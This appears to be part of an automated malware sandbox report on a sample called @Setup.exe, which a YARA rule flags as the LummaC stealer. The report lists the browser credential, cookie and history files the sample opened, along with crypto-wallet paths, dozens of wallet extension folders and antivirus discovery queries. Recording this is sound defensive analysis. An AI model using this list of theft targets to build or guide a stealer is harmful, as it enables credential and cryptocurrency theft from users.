              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeQueries volume information: C:\Users\user\AppData\Local\Temp\679f904c VolumeInformation
              Source: C:\Users\user\Desktop\@Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: @Setup.exe, 00000000.00000002.2287759183.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1966999241.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259753444.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1967410742.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1966999241.000000000340A000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982763831.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: find.exe, 0000001C.00000002.2780867441.0000027A51AFB000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001C.00000002.2780935762.0000027A51D70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: C:\Users\user\Desktop\@Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: @Setup.exe PID: 1900, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: @Setup.exe, 00000000.00000003.1940349360.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
              Source: @Setup.exe, 00000000.00000003.1940349360.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: @Setup.exe, 00000000.00000003.1940349360.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
              Source: @Setup.exe, 00000000.00000003.1843769815.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: @Setup.exe, 00000000.00000003.1940349360.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: @Setup.exe, 00000000.00000003.1940349360.0000000000A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: @Setup.exe, 00000000.00000003.1843769815.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: @Setup.exe, 00000000.00000003.1940285290.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: @Setup.exe, 00000000.00000003.1940285290.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
